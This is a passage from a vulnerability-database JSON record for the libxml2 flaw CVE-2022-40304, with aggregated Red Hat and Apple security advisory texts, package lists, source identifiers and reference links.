oadp-operator\nOADP-1217 - update velero + restic to 1.9.5\nOADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed\nOADP-1289 - Restore partially fails with error \"Secrets \\\"deployer-token-rrjqx\\\" not found\"\nOADP-290 - Remove creation/usage of velero-privileged SCC\n\n6. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified\n2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2023:0338-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0338\nIssue date: 2023-01-23\nCVE Names: CVE-2022-40303 CVE-2022-40304\n====================================================================\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-devel-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-devel-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\nlibxml2-devel-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-devel-2.9.13-3.el9_1.i686.rpm\nlibxml2-devel-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 9):\n\nSource:\nlibxml2-2.9.13-3.el9_1.src.rpm\n\naarch64:\nlibxml2-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-2.9.13-3.el9_1.i686.rpm\nlibxml2-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-40303\nhttps://access.redhat.com/security/cve/CVE-2022-40304\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. Bugs fixed (https://bugzilla.redhat.com/):\n\n2171870 - CVE-2023-0923 odh-notebook-controller-container: Missing authorization allows for file contents disclosure\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHODS-6123 - Update dsp repo to match upstream kfp-tekton repo\nRHODS-6136 - Verify status of manifests\nRHODS-6330 - Remove Openvino and Etcd images from quay for self-managed deployments\nRHODS-6779 - [Model Serving] fallback image for ovms is not published, leading to image pull errors in upgrade scenarios\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-12-13-8 watchOS 9.2\n\nwatchOS 9.2 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213536. \n\nAccounts\nAvailable for: Apple Watch Series 4 and later\nImpact: A user may be able to view sensitive user information\nDescription: This issue was addressed with improved data protection. \nCVE-2022-42843: Mickey Jin (@patch1t)\n\nAppleAVD\nAvailable for: Apple Watch Series 4 and later\nImpact: Parsing a maliciously crafted video file may lead to kernel\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46694: Andrey Labunets and Nikita Tarakanov\n\nAppleMobileFileIntegrity\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to bypass Privacy preferences\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2022-42865: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nCoreServices\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to bypass Privacy preferences\nDescription: Multiple issues were addressed by removing the\nvulnerable code. \nCVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of\nOffensive Security\n\nImageIO\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46693: Mickey Jin (@patch1t)\n\nIOHIDFamily\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with improved state\nhandling. \nCVE-2022-42864: Tommy Muir (@Muirey03)\n\nIOMobileFrameBuffer\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46690: John Aakerblom (@jaakerblom)\n\niTunes Store\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: An issue existed in the parsing of URLs. This issue was\naddressed with improved input validation. \nCVE-2022-42837: an anonymous researcher\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with additional\nvalidation. \nCVE-2022-46689: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause kernel code execution\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year\nLab\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app with root privileges may be able to execute arbitrary\ncode with kernel privileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42845: Adam Doup\u00e9 of ASU SEFCOM\n\nlibxml2\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: An integer overflow was addressed through improved input\nvalidation. \nCVE-2022-40303: Maddie Stone of Google Project Zero\n\nlibxml2\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project\nZero\n\nSafari\nAvailable for: Apple Watch Series 4 and later\nImpact: Visiting a website that frames malicious content may lead to\nUI spoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. \nCVE-2022-46695: KirtiKumar Anandrao Ramchandani\n\nSoftware Update\nAvailable for: Apple Watch Series 4 and later\nImpact: A user may be able to elevate privileges\nDescription: An access issue existed with privileged API calls. This\nissue was addressed with additional restrictions. \nCVE-2022-42849: Mickey Jin (@patch1t)\n\nWeather\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to read sensitive location information\nDescription: The issue was addressed with improved handling of\ncaches. \nCVE-2022-42866: an anonymous researcher\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 245521\nCVE-2022-42867: Maddie Stone of Google Project Zero\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory consumption issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 245466\nCVE-2022-46691: an anonymous researcher\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may bypass Same\nOrigin Policy\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 246783\nCVE-2022-46692: KirtiKumar Anandrao Ramchandani\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may result in the\ndisclosure of process memory\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42852: hazbinhotel working with Trend Micro Zero Day\nInitiative\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nWebKit Bugzilla: 246942\nCVE-2022-46696: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 247562\nCVE-2022-46700: Samuel Gro\u00df of Google V8 Security\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A logic issue was addressed with improved checks. \nCVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs\n\u0026 DNSLab, Korea Univ. \n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 247420\nCVE-2022-46699: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 244622\nCVE-2022-42863: an anonymous researcher\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Zweig of Kunlun Lab for their\nassistance. \n\nSafari Extensions\nWe would like to acknowledge Oliver Dunk and Christian R. of\n1Password for their assistance. \n\nWebKit\nWe would like to acknowledge an anonymous researcher and scarlet for\ntheir assistance. \n\nInstructions on how to update your Apple Watch software are available\nat https://support.apple.com/kb/HT204641 To check the version on\nyour Apple Watch, open the Apple Watch app on your iPhone and select\n\"My Watch \u003e General \u003e About\". Alternatively, on your watch, select\n\"My Watch \u003e General \u003e About\". \nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke\nNxlyKA//eeU/txeqNxHM7JQE6xFrlla1tinQYMjbLhMgzdTbKpPjX8aHVqFfLB/Q\n5nH+NqrGs4HQwNQJ6fSiBIId0th71mgX7W3Noa1apzFh7Okl6IehczkAFB9OH7ve\nvnwiEECGU0hUNmbIi0s9HuuBo6eSNPFsJt0Jqn8ovV+F9bc+ftl/IRv6q2vg3rl3\nDNag62BCmCN4uXmqoJ4CKg7cNbddvma0bDbB1yYujxdmFwm4JGN6aittXE3WtPK2\nGH2/UxdZll8FR7Zegh1ziUcTaLR4dwHlXRFgc6WC8hqx6T8imNh1heAPwzhT+Iag\npiObDoMs7UYFKF/eQ8LUcl4hX8IOdLFO5I+BcvCzOcKqHutPqbE8QRU9yqjcQlsJ\nsOV7GT9W9J+QhibpIJbLVkkQp5djPZ8mLP0OKiRN1quEDWMrquPdM+r9ftJwEIki\nPLL/ur9c7geXCJCLzglMSMkNcoGZk77qzfJuPdoE0lD6zjdvBHalF5j8S0a1+9gi\nex3zU1I+ixqg7CvLNfkSjLcO9KOoPEFHnqEFrrO17QWWyraugrPgV0dMYArGRBpA\nFofYP6bXLv8eSUNuyOoQxF6kS4ChYgLUabl2NYqop9LoRWAtDAclTiabuvDJPfqA\nW09wxdhbpp2saxt8LlQjffzOmHJST6oHhHZiFiFswRM0q0nue6I=\n=DltD\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40304"
},
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "169857"
},
{
"db": "PACKETSTORM",
"id": "171173"
},
{
"db": "PACKETSTORM",
"id": "170318"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-429438",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-40304",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "169857",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170318",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170754",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169824",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170555",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169620",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170955",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169732",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170097",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2023.0246",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1467",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5286",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6321",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5792.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.0816",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1501",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5614",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1267",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.0513",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5455",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1041",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1398",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "170753",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171173",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170752",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170317",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170316",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171016",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171043",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170899",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170312",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169858",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171042",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171017",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170315",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171040",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171260",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-429438",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-40304",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171310",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170668",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "169857"
},
{
"db": "PACKETSTORM",
"id": "171173"
},
{
"db": "PACKETSTORM",
"id": "170318"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"id": "VAR-202210-1070",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:25:26.950000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libxml2 Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=215772"
},
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2022-40304: dict corruption caused by entity reference cycles",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=8363a596e2a5d2dc61357b1dbd72b616"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-40304"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-415",
"trust": 1.0
},
{
"problemtype": "CWE-611",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20221209-0003/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213531"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213533"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213534"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213535"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213536"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/21"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/24"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/25"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/26"
},
{
"trust": 1.7,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b"
},
{
"trust": 1.7,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/tags"
},
{
"trust": 1.7,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/tags/v2.10.3"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/27"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40304"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40303"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1041"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170555/red-hat-security-advisory-2023-0173-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1267"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1467"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170318/apple-security-advisory-2022-12-13-8.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1501"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213505"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5286"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170955/red-hat-security-advisory-2023-0634-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169857/apple-security-advisory-2022-11-09-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170754/red-hat-security-advisory-2023-0468-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170097/ubuntu-security-notice-usn-5760-2.html"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213534"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0246"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-40304/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169732/debian-security-advisory-5271-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/libxml2-three-vulnerabilities-39554"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169824/libxml2-attribute-parsing-double-free.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1398"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0816"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169620/gentoo-linux-security-advisory-202210-39.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6321"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0513"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5792.2"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5455"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5614"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-43680"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42011"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-35737"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42010"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42012"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43680"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35737"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42010"
},
{
"trust": 0.3,
"url": "https://docs.openshift.com/container-platform/latest/cicd/gitops/understanding-openshift-gitops.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42011"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-4415"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3821"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3821"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1022225"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-46285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2953"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-48303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2869"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4883"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
